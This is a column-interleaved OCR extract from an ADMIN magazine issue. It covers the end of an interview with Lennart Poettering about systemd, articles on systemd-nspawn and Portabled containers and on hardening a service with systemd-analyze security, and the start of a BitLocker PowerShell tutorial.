scheme, but there is far more to be achieved today with most distribu- egy at all. However, if we give sys-
done in this area. tions relying on systemd, but did this temd security features that are then
Thus, while many – possibly even not happen at the cost of a far larger widely used, that’s worth far more
most – users use disk encryption on number of systems being affected in at the end of the day.
Linux, typically typing the disk pass- the case of security-relevant errors To put it another way, I find it far
word does not protect the program than the case would be with more more interesting to make one class
code very well, which leaves you diversity? of attacks completely impossible
helplessly exposed to an evil maid than to hope that “only” one half
attack, an offline attack in which LP: Acceleration was never the of the Linux world is vulnerable
someone simply exchanges the boot primary goal of systemd development to it because the other half uses a
code of the system being attacked. but simply a side effect of the work slightly different system. On top of
You have no way to tell whether the to implement the boot process in this, sure, there is definitely some
cryptsetup binary to which you give a reasonably state-of-the-art way. interesting competition driving the
your password is really the one you We have emphasized this time security of computer systems, such
trust or perhaps a hijacked one that and time again. We always try to as Chrome OS, Android, Windows,
immediately sends the password to find the balance between having a macOS, and so on. For us, this is
an attacker. manageable, modular system while highly relevant inspiration.
Other operating systems are doing booting quickly and in a reasonably I would like to set one thing straight:
much better, including Linux-based straightforward way. If in doubt, Thus far, systemd actually looks very

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 17
 F E AT U R E S Interview: Lennart Poettering

good when it comes to code quality service will ultimately benefit a sig- LP: The systemd-nspawn tool is ver-
and vulnerabilities. We have signifi- nificant majority of users. This should satile and so are portable services.
cantly fewer CVEs or the like (admit- also be the case with systemd-oomd. Where one makes more sense than
tedly not a good metric) than other To use available resources in the best the other is not always clearly de-
projects with similar numbers of lines possible way under load, you need a fined. Basically, though, I would say
of code. It should also be remembered service like OOMd. Unlike, say, the systemd-nspawn is about working in
that projects such as wpa_supplicant OOM killer in the kernel, it keeps a similar way to lightweight VMs
weigh in with more lines of code than an eye on the whole system. It tries (virtual machines). For example,
systemd (even the kernel has many everything to handle resource bottle- with Nspawn, a more or less com-
times that), so with all the compo- necks and the resulting latencies as plete Linux can be booted without
nents that come with systemd, the locally as possible and not to affect any overhead, almost like in a VM.
init system is not exactly the primary the whole system. This is needed to Portable services is more about mak-
component to worry about. The at- utilize thick servers as fully as pos- ing individual system services a bit
tack surface of the WiFi stack or the sible but also to achieve maximum more portable (i.e., making it easier
kernel turns out to be far larger, so a performance in embedded systems to move relatively integrated system
monoculture there certainly causes with few resources – and helps on the services between machines).
bigger problems. desktop, as well. For the first time, You could also say that the first pro-
you can no longer freeze your laptop gram that runs as a payload in a VM
LM: Originally, systemd was intended with make -j on the wrong build tree. is the operating system kernel. In an
as a replacement for the SysVinit Nspawn container this is an OS init
system. In the meantime, however, LM: How does systemd fit into a world system instead, whereas in a portable
it manages all kinds of resources, where applications are increasingly service it is the main program of a
including its own out-of-memory no longer launched directly from the service. The latter may resemble a
(OOM) killer. In 2018, Facebook operating system but in the form of Docker container, but Docker contain-
already came out with OOMd devel- containers? ers tend to run isolated from the host
oped in-house as a competitor to the OS, which is not so much the case for
implementation in the kernel. What LP: Here, too, you need an underly- portable services.
makes the systemd version better ing operating system. The container
than the two predecessors? strategy is (among other aspects) pri- LM: Kubernetes and its offshoots such
marily about isolation from the host as OpenShift have become widely ac-
LP: The systemd-oomd service in- OS. However, extensive isolation from cepted for container management.
tegrated into systemd was pro- the host operating system is neither What niche can systemd-nspawn best
grammed by Facebook developers. helpful nor possible for many applica- serve?
It is a simplified evolution of the old tions. A service that makes extensive
separate OOMd. use of hardware can only be run in LP: systemd-nspawn can run contain-
Systemd manages system services – a container if you rely on hacks and ers, whereas Kubernetes orches-
that is its very specific task. Two fac- workarounds. trates containers in clusters – two
ets of this management are lifecycle Containers are without question very very different tasks. Kubernetes
management and resource control useful but are more for payloads than normally uses a tool like runc to
(i.e., correct and clean startup and for system components. For the lat- run the containers. If you want, you
shutdown of services at the right ter, you need infrastructure like that could use systemd-nspawn instead of
times and the allocation of resources provided by systemd. The sandbox- runc to do this; the infrastructure
and their limits). An OOM service ing offered by systemd for system would lack very little. For example,
directly intervenes in exactly these services is ultimately inspired by systemd-nspawn already has direct
two parts. Depending on individu- container strategies, but it takes into support for running OCI containers
ally configurable parameters, it shuts account that complete isolation (e.g., onboard.
down services as needed. This works a complete directory tree of its own) I personally have certain doubts
best when the OOM service and sys- is more of a hindrance for system ser- about the Kubernetes approach. It
temd agree on what to do. That’s why vices. Therefore, it allows for far more seems to me that a lot of things have
we integrate strategies: systemd-oomd modular sandboxing that tries to sup- not been thought through to the end
can analyze the system and become port integration, while still minimiz- but glommed together with hot glue.
active; the systemd service manager ing the attack surface for hacks as That’s why I haven’t done anything
knows about it and informs the ad- much as possible. yet to make systemd-nspawn usable as
ministrator correctly. a back end for Kubernetes. I think
Additionally, the following applies LM: What distinguishes containers such an approach would have advan-
here: We always add components to launched by Nspawnd from portable tages in terms of security and espe-
systemd when we assume that the services? cially resource control.

18 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Interview: Lennart Poettering F E AT U R E S

Basically, however, Docker-style con- directly in the home directory, the verification takes place completely
tainers usually only run individual user should not be allowed to edit it automatically, without the user hav-
services in them, not the entire oper- there. Who can do this if the direc- ing to do it manually. This means
ating system. As mentioned before, tory is to be mounted on arbitrary two things: First, users cannot easily
the focus of systemd-nspawn is more hosts? modify their own user records un-
on the latter. We want to make it less they know the system’s secret
easy to run full Linux userspaces LP: Typically, home directories key, which is protected under /var
in them, much like in a VM or on are still located on your own lap- and should therefore only be known
a physical system. So, the focus of top’s hard drive, but if you let to the system and root. Second,
systemd-nspawn is a bit different from systemd-homed manage them, you can when moving a home directory from
runc and Kubernetes. also put them on, say, a USB stick one system to another, you have to
and move them safely back and forth make sure that the signature key of
LM: You propose migratable home between different systems. I’m sure the first machine is also accepted on
directories that bring the user ac- some users will find this helpful, the second machine, which can be
count information right along with but it’s more of a side effect of the done by a simple scp.
them. Does that only work if the design and not the goal. I myself use
user mounts their home directory systemd-homed to manage my home LM: Mr. Poettering, thank you very
on their own host? Who else would directory, but I just store it on my much for the insightful interview. Q
create such a directory on a portable laptop’s SSD.
medium? In the conventional system, The user records that systemd-homed
the write protection for /etc/passwd manages are cryptographically Info
ensures that a user cannot add their signed, and the daemon only ac- [1] Attribution-ShareAlike 3.0 Unported (CC
account to arbitrary groups, for ex- cepts records that match the lo- BY-SA 3.0): [https://creativecommons.org/
ample. If this information is located cal machine. This signing and licenses/by-sa/3.0/]
F E AT U R E S Container Security

Create secure simple containers with the systemd tools Nspawnd and Portabled

Isolation Ward
Systemd comes with two functions for container management that allow controversies surrounding the product.
In the container context, these func-
many programs to run more securely through isolation. By Martin Loschwitz tions include Nspawnd and Portabled.
When deployed correctly, they draw
The debate surrounding systemd, relevance is dwindling in any case in on features from the container world
originally launched with the simple the age of containerized applications. to make conventional applications
goal of replacing the ancient SysVinit If MariaDB is just a container you more secure. If you use Nspawnd
scripts in most Linux distributions need to launch, then the init system wisely, you could even save yourself
with a contemporary solution, has hardly needs to perform any magic. the trouble of needing Docker or Pod-
caused even venerable projects like If you follow Red Hat, SUSE, and its man. In this article, I provide an in-
Debian GNU/Linux to split into a pro- offspring, clearly containers is where troduction to these two functions and
systemd faction (Debian) and an anti- the journey is headed (see the “Con- explain how you can use the solutions
systemd faction (Devuan). tainer Advantages” box). A container- to supplement your own setups.
However you look at it, though, suc- first principle now applies to all enter-
cess has proved systemd originator prise distributions, with the exception Unknown Container Runtime
Lennart Poettering right. No major of Debian. Systemd has a few aces
distribution today would seriously up its sleeve that most admins don’t When asked about runtime environ-
consider replacing systemd with even know about – not least because ments for containers, most admins
another solution. The init system’s of the sometimes almost hysterical intuitively think of one of two candi-
dates: Docker or Podman. Docker re-
Container Advantages turned containers on Linux to the land
From the point of view of both vendors and the breach and offers precisely one container of the living and provided a decent
software producers, containers are conve- that runs everywhere. Brave new world – and business model. That containers are
nient, with the distribution only having to so elegant. considered commercially attractive at
provide a few components: a kernel and a As great as this hip stuff may be, the inven- all today is largely thanks to Docker’s
runtime environment. The software provider, tory of current IT environments will remain persistent work. Podman, on the other
in turn, also only needs one container in their around for a while yet, as well as the question hand, is known by most admins as
portfolio because it runs on basically every of how this inventory can be used and man- the anti-Docker solution created by
system with a functional container runtime. aged more sensibly and in a better way. What Red Hat that exists because the Docker
Photo by Ian Taylor on Unsplash

Where Red Hat and its associated distros is particularly annoying is that conventional developers once tangled with the crim-
used to have to maintain different versions environments do not benefit from the many son chapeau and, as expected, got the
of MariaDB, PostgreSQL, and practically all advantages that containers undoubtedly of- wrong end of the stick.
the relevant tools for their own distributions, fer, such as the separation of permissions,
Because Podman is meant to work as
today they only provide a shell and a kernel. isolated access to your filesystems, and moni-
a one-to-one replacement for Docker.
The provider of the software itself steps into tored network traffic.
However, it adopts much of its

20 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Container Security F E AT U R E S

Figure 1: Docker comprises a multitude of services and components. If you only need simple protection, you could quickly feel overwhelmed
by the features (credit: Docker docs [1]).

architectural assumptions, and they’re by a bridge or some other means. Control groups (cgroups) are added on
tough, because the Docker notion Namespaces do not only exist for top in many container environments.
of containers is complex (Figure 1) network stacks; they also apply to Again, they are deeply embedded in the
and can overwhelm you with feature individual points in the filesystem, to Linux kernel. In very simplified terms,
bloat. Containers should be simple. process IDs, and to the assignment of cgroups control access by individual
All container implementations on the user IDs on a Linux system. They al- processes to the system’s resources.
market ultimately rely on a relatively ways work along the same principle: They complement namespaces nicely
small set of security features that the As soon as a certain process starts in because they help you enforce an even
Linux kernel itself has offered for a a namespace, the namespace acts like tighter set of rules for applications and
few years. a jail from which it is impossible to processes than would be possible with
No container implementation can break out. namespaces alone.
do without
namespaces,
which logi-
cally separate
individual parts
of the system
(Figure 2).
A network
namespace,
for example,
lets you cre-
ate virtual
network cards
without giving
them direct
access to the
physical NICs
of the host.
Instead, this
access must Figure 2: The kernel namespaces feature has many uses in the context of containers, allowing areas in a virtual system
be established to be isolated from the main system (credit: Ivan Zahariev [2]).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 21
F E AT U R E S Container Security

More than Runtimes tools without too much tinsel – is a The following example assumes
candidate for the target group that Debian GNU/Linux 11 alias “Bulls-
If Nspawnd is a runtime environment Nspawnd has in mind, even if the eye” as the distribution used in the
for containers, yet at least two well- scope of Nspawnd has naturally ex- container. In the first step, you build
functioning environments already panded in recent years. an empty folder on a Debian system
exist in the form of Docker and Pod- The daemon has been part of systemd after installing the debootstrap pack-
man, why, some might ask, does since 2015, so it’s an old acquain- age (Figure 3), which contains a ba-
Poettering have his fingers in the pie tance. The “N” in the name – you sic Bullseye system:
again? The answer to this question is probably guessed it after following
stunningly simple: systemd-nspawnd the article up to this point – stands # debootstrap --arch amd64 U
targets admins who really only want for “namespaces.” Reduced to the es- bullseye /mnt/containers/bullseye-1 U
to use basic kernel features to isolate sential facts, Nspawnd is a tool that https://debian.inf.tu-dresden.de/debian/
individual processes. sets up the namespaces required for
The problem with Podman and isolated operation of applications and To log in to the container as root,
Docker, after all, is that you never then starts the applications. Some de- pts/0 must be in /etc/securetty:
just get the program in question. velopers jokingly refer to it as “Chroot
Instead, they come with a huge on steroids,” which works well as a echo "pts/0" >> /mnt/containers/U
pile of assumptions and prerequi- metaphor. In the context of concrete bullseye-1/etc/securetty
sites about how to run a container technology, however, the comparison
well and sensibly. You might not is misleading. If you now want to start a running
even want to deal with things like container from the directory you just
volumes, software-defined network- Containers, Pronto! created, type:
ing, and other stuff if all you want
to do is put an Apache process in Nspawnd is now included in most systemd-nspawn U
a virtual jail. Also, you might not distributions, so a container can be -D /mnt/containers/bullseye-1
want to install dozens of megabytes created on a normal Linux system
of additional software for Docker or in next to no time. Creating a usable You can now run passwd to change the
Podman, thereby raising the mainte- template takes longest; in Docker or password for root in the container or
nance overhead, although this step Podman parlance, this would be re- add new users. All other commands
is not strictly necessary from a func- ferred to as an image. Nspawnd only that you will be familiar with from a
tional point of view. Anyone who requires a working filesystem on a normal Debian system are available
can see themselves in this scenario Linux distribution. You can put this in to you. The recommendation is to
– simple containers that use built-in place in different ways. store central files such as the package
sources in the
template and to
update the pack-
age sources in the
template immedi-
ately by running
apt update. You
need to delete the
/etc/hostname file
in the template
so that the con-
tainer uses the
name assigned by
Nspawnd later.
Finally, D-Bus
needs to be in-
stalled in the
container be-
cause the machi-
nectl userland
tool (Figure 4),
which you use to
Figure 3: A container suitable for running in Nspawnd or Portabled is quickly built with typical Debian tools like control the con-
debootstrap. tainers from the

22 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Container Security F E AT U R E S

host, cannot communicate with the

particular container otherwise. Once
the template is created, copy it to a
location with a suitable name (e.g.,
/var/lib/machines/webserver-1). The
next step is to start the container
with:

systemd-nspawn -M webserver-1 U
-b -D webserver-1

After that, you can install the user-

land software that you want to run in
the container (e.g., an Apache web
server). Figure 4: The machinectl command manages containers in Nspawnd in the shell. If so
desired, the process can be automated with a unit file.
Unit Automation
Portabled plays a very similar tune: Finding an Image
If you want to wake up the con- Under the hood, it uses much of
tainer automatically at system the functionality that Nspawnd For an image to be usable with Por-
startup, you can do so with a sys- also uses. tabled, it only needs to meet a few
temd unit file (Listing 1), where Portabled has been part of systemd requirements. As in the previous
you can also configure the network since version 239, so it should example, the recommendation is to
for the container. Systemd basically certainly be in place on recent use tools like debootstrap to create
offers shared networking over a distributions. Although Podman a basic filesystem. As in the case of
bridge or with a variety of other op- and Docker fans won’t like to hear Nspawnd, portable images do not
tions. The shared variant, however, it, Portabled essentially offers need their own kernel or bootloader,
is most convenient if it is only a precisely the features that Red Hat, but if you want to use a RAW image,
matter of passing through individual SUSE, and their offspring have in it must be equipped with a suitable
ports. The file from Listing 1 is a mind when they talk about “rump partition table that the Linux kernel
ready-made unit file for a Bullseye systems” and look to deliver their on the host system understands.
web server container that Nspawnd software in containers. However, The systemd in the image also
starts at boot time. it does so without most of their needs a working unit file for the ser-
After a systemd reload, the command complexity. vice or services that the container
Admittedly, the container and its en- will be running.
machinectl start webserver-1 vironment consequently lack a few The /etc/machine-id file must be in
features that Docker and others give place, as must /usr/lib/os-release.
starts the freshly created container. you. When it comes to just isolating Also, a resolv.conf is required for
If you now configure the directory services and making them portable, the services in the container. Ev-
you just copied to run a web server, though, Portabled is very handy, erything else is taken care of auto-
it will run autonomously and in iso- especially for existing systems that matically by tools like debootstrap.
lation from the rest of the system. you want to harden without having The example here assumes that you
Even if someone breaks into an un- to switch completely to Docker or have created a lamp.raw file that
maintained Joomla or Typo3 on the Podman. contains a basic Debian GNU/Linux
web server, they do not automati- The basic idea behind Portabled 11 and has Apache 2, MariaDB, and
cally gain access to the resources of is that you build small container PHP. Most importantly, the systemd
other users or the host – and com- images containing one or more
pletely without Docker, Podman, or services along with a matching Listing 1: Systemd Unit for Container
other hipster stuff. configuration. If a Linux system has # /etc/systemd/nspawn/webserver-1.nspawn
a current kernel with support for [Exec]
namespaces and a current systemd PrivateUsers=pick
Mini-Containers
environment, the container image
To understand what the second can be rolled out on this host and [Network]
service I talk about in this ar- operated there – so the theory goes. Zone=web Port=tcp:443

ticle (systemd-portabled) does, you The highlight is that this process is

[Files]
need to revisit the functionality of completely independent of the pack-
PrivateUsersChown=yes
systemd-nspawnd. In practical terms, age manager in place.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 23
 F E AT U R E S Container Security

Listing 2: mkosi Config File extension image data that extends almost trivial. To create a Debian im-
the original image. age that corresponds to that described
[Distribution] Distribution=debian
Release=bullseye Like Nspawnd, Portabled also has in detail above, you just need the
its own command-line interface for command:
[Output] manipulating containers: portablectl.
Format=gpt_ext4 Bootable=yes Output=image.raw For example, the command $ mkosi -d debian U
-r bullseye U
[Packages] portablectl attach U -t gpt_ext4 -b --checksum U
Packages=openssh-client vim --extension lamp_1.raw U --password secret U
debian-bullseye_1.raw lamp --package openssh-client,vim U
[Validation]
-o image.raw
Password=secret
attaches the lamp extension to the im-
age for Debian GNU/Linux Bullseye. An image.raw file will then con-
unit files must be located in the In the next step, the container that tain a Bullseye image that in turn
image in /usr/lib/systemd/sys- Portabled stitches together with Over- contains openssh-clients and Vim,
tem/lamp-apache.service and /usr/ layFS can then be treated as if it were along with the standard selection
lib/systemd/system/lamp-mariadb. a complete container in its own right. of packages. If you are not a fan of
service for Portabled to find them The workflow described here makes command-line parameters, you can
later. When Portabled then starts it quite easy to maintain a basic im- alternatively pass in a configura-
the container on the target system, age and to vary the use of many small tion file to mkosi. The example from
it copies these files on the host and extensions. Listing 2 has the same effect as the
adds various custom settings that command above.
can relate to, say, logging or han- mkosi Can Help One disadvantage of mkosi is that it
dling output on stdout. Clearly, the does not take care of installing the
systemd developers wanted you to If you are not comfortable with the packages it needs when creating im-
have to do as little work as possible distributors’ tools for creating an ages. On Debian systems, the task of
with portable images. image, you will find that the mkosi manually installing the debootstrap
(make operating system image) tool and debian-archive-keyring packages
Basic and Overlay Images is a good alternative. In simple terms, falls to you before invoking mkosi
mkosi is a small tool that creates a (Figure 5).
Talking of keeping the workload folder with the complete filesystem of
manageable, the workflow described a Linux distribution, which can then Accessing System Resources
here suggests that you have to copy be used in systemd with Nspawnd or
the default image created at the be- Portabled like a normal container. One last question remains to be clari-
ginning for each container that will The program can be found in the sys- fied in the context of this article; oth-
contain a service or multiple ser- temd GitHub directory [3]; its use is erwise, the container fun might come
vices; however, this
is not true because
Portabled also al-
lows you to combine
multiple partial
images and create
a complete image
with OverlayFS. For
this to work, the
extension images
in the /usr/lib/
extension-release.d/
directory must con-
tain a file with an
arbitrary name that
contains at least the
ID= lines with the
extension image ID,
and SYSEXT_LEVEL=
and VERSION_ID
entries with the Figure 5: With mkosi, building images is far easier, but you have to install the distribution-specific tools up front.

24 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Container Security F E AT U R E S

to an abrupt end. How exactly do you Portabled discussed in this article, Portabled can be forgiven for not
provision host system resources in and this cluelessness is a mistake, following the container mantra “a
containers? I do not refer so much to despite your opinion of systemd. If microarchitecture application in a
specific hardware, because containers you use one of today’s major dis- container” – especially against the
do not need their own kernel; they ac- tributions, chances are you have a background that Portabled is more
cess the hardware directly through the setup with systemd. If it is already in likely to be used in classic environ-
host system’s kernel anyway, although place, why not just use it? ments in most cases anyway. In re-
they detour through namespaces to do Both tools presented here offer turn, you can look forward to more
so, adding a degree of control. What genuine added value. Chroot is now convenience, enhanced security,
I mean is much more likely to be pro- considered insecure, and for good and better administrability.
grams that need access to parts of the reason: Several scenarios have been Anyone who is concerned about
/sys tree or that retrieve information documented for breaking out of a isolating services and securing their
from /proc. Occasionally, it also hap- chroot environment. Namespaces systems should definitely have these
pens that an application in one con- in the Linux kernel are not only two standard systemd functions on
tainer needs to access the Unix socket more modern, but also far more fo- their radar. Q
of an application in another container. cused on security, where they offer
The answer to how this works is considerable benefits. If you want
quite simple: You make sure the to isolate applications, either from Info
directory in question exists on the each other or from the rest of the [1] Docker architecture:
host and tell systemd to provide the system, without having to deal with [https://docs.docker.com/get-started/
folders as bind mounts in the con- the complexity of Docker or Pod- overview/]
tainer by means of the BindPaths= man, it is a very good idea to take [2] “Private networking per-process in Linux”
and BindReadOnlyPaths= directives in a closer look at the systemd add-on by Ivan Zahariev:
the container’s systemd unit files. Nspawnd. [https://blog.famzah.net/2014/06/05/
However, keep in mind that this is The same goes for Portabled. private-networking-per-process-in-linux/]
a deliberate, intentional blurring of Strictly speaking, the idea behind [3] mkosi: [https://github.com/systemd/mkosi]
security boundaries. Therefore, you it is nothing other than what the
should only go for this option if you major vendors are currently pursu-
have absolutely no alternative. ing with their container strategies. The Author
Instead of the dependency hell of Freelance journalist Martin
Conclusions the usual package managers, cleanly Gerhard Loschwitz focuses
defined container images contain primarily on topics such
Very few admins are aware of the just the bare necessities and other- as OpenStack, Kubernetes,
systemd components Nspawnd and wise have no external dependencies. and Ceph.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 25
F E AT U R E systemd-analyze

Harden services with systemd

A Hard Nut to Crack

Systemd comes with a metric for determining the security of your system, letting you track how any service can
be secured step-by-step in a sandbox. By Jens-Christoph Brendel
One of the most important goals makes system security under Linux a numerical value for the degree of
in the development of systemd is measurable and improvable. protection (EXPOSURE, where 10 is
securing Linux. Of course, you can More specifically, it is the both the highest and worst value);
only improve what can be measured, systemd-analyze security command a verbal translation of this value
which is why Galileo Galilei advised: that allows this measurement. When (PREDICATE); and another version
“Measure what is measurable, and executed, it returns a table like of the rating (HAPPY) in the form of
make measurable what is not.” Fol- that shown in Figure 1, listing each an emoji.
lowing this maxim, systemd now service managed by systemd (UNIT); Additionally, systemd-analyze can
reveal how it arrives at its assessment:
To see this, start it with the name of
a service unit. As shown in Figure 2,
it lists all the factors that have been
checked, along with a checkmark for
passed or an X for failed.

Not a Tough Cookie

After that, the user knows systemd’s
opinion on the security status of the
services it checked, but what can be
Lead Image © Didgeman, Pixabay.com

done to improve the bad scores? To

find out, you can build a minimal
service, whose security you then
elevate step-by-step. As an example,
first create a minimal HTML page in
an empty directory (e.g., /home/$USER/
Figure 1: Tabular rating of services by security aspects. Python/sectest/, which will serve later

26 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 systemd-analyze F E AT U R E

as the document root

of a small web server)
(Listing 1).
The easiest approach
is to borrow the web
server itself from Py-
thon, which already
has a simple model that
can be used with virtu-
ally no configuration.
Next, wrap the server
start in a systemd unit
file – again, keeping it
as simple as possible
(Listing 2). Now save
the unit file as /lib/sys-
temd/system/helloworld.
service and the HTML
page as index.html in the Figure 2: A detailed view of all factors considered in the evaluation.
document root directory.
After typing you need to reload all unit files and
restart the service:
systemctl start helloworld.service
systemctl daemon-reload
enter localhost:8080 in the address systemctl restart helloworld.service Figure 3: Starting point: The new service is
bar of a web browser to bring up the completely insecure.
plain Hello World page. If you now look at the output of
In this state, without any precautions, systemd-analyze security, the immediately deleted after the process
the service is completely unprotected. exposure value of helloworld.service ends. Attacks based on swapping or
In the output of systemd-analyze se- has already dropped slightly, from manipulating temporary files now come
curity, it appears with a high score of 9.6 to 9.4. Admittedly, this still to nothing. The exposure value drops
9.6 as UNSAFE and a shocked emoji counts as unsafe. to 9.0, but the rating remains unsafe.
(Figure 3). On with the task: A whole class of at- The next step is to add
tacks can be rendered impossible by
adding RestrictNamespaces=uts ipc pid user cgroup
Fundamentals
In the first step, add a line reading PrivateTmp=yes to the unit file, which prevents the
process from accessing the listed
NoNewPrivileges=true to the unit file, which causes systemd namespaces. The list deliberately
to create a new, exclusive filesys- excludes the net namespace and a
to the Service section of the unit file tem namespace for the process and few others that the web server has to
to prevent the process from escalating to mount /tmp and /var/tmp/ there. use. After this action, the exposure
its privileges later (e.g., with setuid Therefore, the temporary files are no value drops below 9 (to 8.8) for the
or setgid bits). After this (as for all longer shared
subsequent additions to the unit file), publicly and are Listing 2: Unit File
[Unit]
Listing 1: Minimal HTML Page Description=Simple HTTP Server
<!doctype html> Documentation=https://docs.python.org/3/library/http.server.html
<html lang=en>
<head> [Service]
<meta charset=utf-8> Type=simple
<title>Hello World</title> WorkingDirectory=/home/jcb/Python/sectest
</head> ExecStart=/usr/bin/python3 -m http.server 8080
<body> ExecStop=/bin/kill -9 $MAINPID
<p><h1>HELLO WORLD!</h1></p>
</body> [Install]
</html> WantedBy=multi-user.target

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 27
F E AT U R E systemd-analyze

also stopped it loading and unloading unrestricted superuser rights just be-
such modules for the web server pro- cause it needs a single special right.
cess. From now on, it cannot access You can take a fairly restrictive ap-
the control groups. Although con- proach here and define
tainer administration software might
Figure 4: For the first time, the emoji is not need this access, a web server does CapabilityBoundingSet=U
dissatisfied: You have achieved a medium not. This step pushes the exposure CAP_NET_BIND_SERVICE U
level of security. value down to 8.1. CAP_DAC_READ_SEARCH
Finally, you can set:
first time, and the rating is no longer which excludes, for example, the as-
unsafe, only EXPOSED. The emoji’s ProtectSystem=strict signment of CAP_SYS_ADMIN, CAP_DAC_
expression changes from horrified to PrivateUsers=strict OVERRIDE, or CAP_SYS_PTRACE to the
merely unhappy. process and deducts many points. The
The first line mounts /usr and the exposure value now drops to 5.7 (Fig-
Kernel and Control Groups bootloader directories /boot and /efi ure 4). The rating now confirms a ME-
in read-only mode for all processes DIUM level of security, and for the first
The next step is to enable additional that this unit starts. The second line time the emoji now looks neutral and
protections in the unit file: configures a user group mapping for no longer unhappy about the situation.
the process that maps root and the
ProtectKernelTunables=yes user that starts the unit’s main process Conclusions
ProtectKernelModules=yes to itself – but maps all other users or
ProtectControlGroups=yes groups to nobody. The system’s user Quite a few options are yet left to pro-
and group database is thus decoupled vide additional security. A good com-
The kernel variables, which users can from the process running in its own pilation of all systemd options suit-
access via /proc/sys/, /sys, /proc/ sandbox. The exposure value now able for hardening services and that
sysrq-trigger/, /proc/latency_stats/, drops below 8 (more precisely, to 7.8). open up a wide field for further opti-
/proc/acpi/, /proc/timer_stats/, mizations is provided in a description
/proc/fs/, and /proc/irq/, are now Capabilities on GitHub [1]. With systemd-analyze
read-only and therefore no longer edit- as a measuring tool, you can track
able for the process. In any case, the Finally, you can limit the capabilities your progress in each case. Q
system should only have write access that will be available to the process.
to these variables during booting, so These are rights that can be granted Info
you are not losing any functionality. to unprivileged processes in small [1] Hardening options for systemd services:
Because the web server does not need chunks, which makes it unneces- [https://gist.github.com/ageis/
any special kernel modules, you have sary to give a process completely f5595e59b1cddb1513d1b425a323db04]

28 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
TO O L S BitLocker and PowerShell

Managing BitLocker with PowerShell

Babylonian Letters
BitLocker provides current Windows versions a good, closely integrated encryption solution and lets you
manage and maintain this feature with PowerShell. By Thomas Bär and Frank-Michael Schlede

Encrypting drives on Windows You are better advised to use the client systems on domain networks
in user circles is still not as wide- command line and PowerShell. We automatically by means of network
spread as is prudent from a security tested the examples in this article unlocking on reboot can then be
perspective. Especially for mobile both with version 5.1, which is added to the system as a feature.
systems such as notebooks, hard currently installed on Windows sys- Of course, you can add BitLocker to
drives should be secured with a tems by default, and with the open a Windows server with PowerShell,
transparent encryption solution source variant PowerShell 7 on Win- but first check to see whether Bit-
such as BitLocker so that data is dows 10 and Windows Server 2019 Locker is already installed on the
protected, even if a thief removes computers. BitLocker cmdlets and system with:
the hard drive and attempts to options were not different between
access it. System administrators systems. Get-WindowsFeature -Name Bitlocker
should seriously consider taking
advantage of the option to automate Adding Encryption If the Install State column of the
the setup and configuration of hard cmdlet reports that the feature is
drive encryption. BitLocker is not available on the installed, the software is ready to
This is where PowerShell comes current Windows 10 Home version. use. If, on the other hand, it says
into play. Microsoft provides The device encryption software is Available, the administrator has to
command-line tools and matching available by default on Windows 10 install BitLocker (Figure 1), which
cmdlets in the form of manage-bde Professional or Enterprise but usu- can be done with the associated sub-
and repair-bde. Both the PowerShell ally has to be enabled. Exceptions features and tools by entering:
cmdlets and command-line com- include, say, Surface devices by Mi-
mands let you handle all the tasks crosoft – the same type of encryption Install-WindowsFeature Bitlocker U
and settings that are supported is automatically enabled there. -IncludeAllSubFeature U
Lead Image © sergey Mayorov, 123RF.com

through the control panel. Although The server versions of Windows also -IncludeManagementTools
the BitLocker setting is now linked support the use of drive encryption.
in the new system settings in the However, for the server operating After that, the cmdlet reports the
pre-release version of Windows 11 systems, you need to install Bit- Success status as True and explicitly
and version 21H2 of Windows 10, it Locker as a feature in Server Man- points out that a restart of the oper-
still takes you to the settings in the ager or the new Windows Admin ating system is now needed. You can
legacy Windows interface from the Center. Additionally, the option to initiate this with Restart-Computer
pre-Windows 10 era. unlock operating system volumes of directly in PowerShell.

30 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 BitLocker and PowerShell TO O L S

cmdlets that are connected to the computer. unlocking. On a system that has a
To display only a specific drive, use lot of drives, listing only those drives
After the reboot, drive encryption the -MountPoint <drive> parameter: with full BitLocker encryption by que-
is then available, as well as the cor- rying the VolumeStatus property of the
responding PowerShell module with Get-BitlockerVolume -MountPoint "E:" corresponding object can be handy:
the cmdlets [1] for BitLocker man-
agement. Typing The Protection Status, VolumeStatus, Get-BitlockerVolume | U
and AutoUnLock enabled options show Where-Object { $_.VolumeStatus -eq U
Get-Command -module BitLocker important information about the cur- 'FullyEncrypted' }
rent status of hard disks or partitions.
shows you which special cmdlets are If the drive is encrypted, Protection With the help of two cmdlets, En-
now available to you (Figure 2). If Status is set to On. VolumeStatus is able-Bitlocker and Disable-Bitlocker,
you want to find out about all the even more precise and shows whether you can then encrypt or decrypt a
drives on your Windows system and the disk or partition is already fully drive or a partition by specifying the
their encryption status, call (with ad- encrypted. The AutoUnlock enabled desired drive again.
ministrator privileges) Get-BitLocker- option shows whether you have con- The command for encryption
Volume. The command lists all drives figured the disk for automatic drive requires a few more parameters.

Figure 1: On Windows Server (version 2019 is shown here), BitLocker needs to be installed.

Figure 2: Finding the special cmdlets for working with BitLocker.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 31
TO O L S BitLocker and PowerShell

In addition to the encryption -Password $PassWd U get-help Enable-Bitlocker -full

method, which you specify with the -PasswordProtector
-EncryptionMethod parameter, you you can display a whole series of
must define the password you use After this call, the drive is encrypted examples onscreen that show you how
to lock the drive (Figure 3). but not yet “locked,” which is accom- the various parameters come into play.
Instead of the -RecoveryKeyPath pa- plished with the help of the final com-
rameter, you can, among other things, mand in Figure 3: At the Command Line
specify the path to a recovery key that
is located elsewhere (e.g., on a USB Lock-Bitlocker -MountPoint "E:" Microsoft also offers the manage-bde
stick). Although we used the -Encryp- command-line tool on its operating
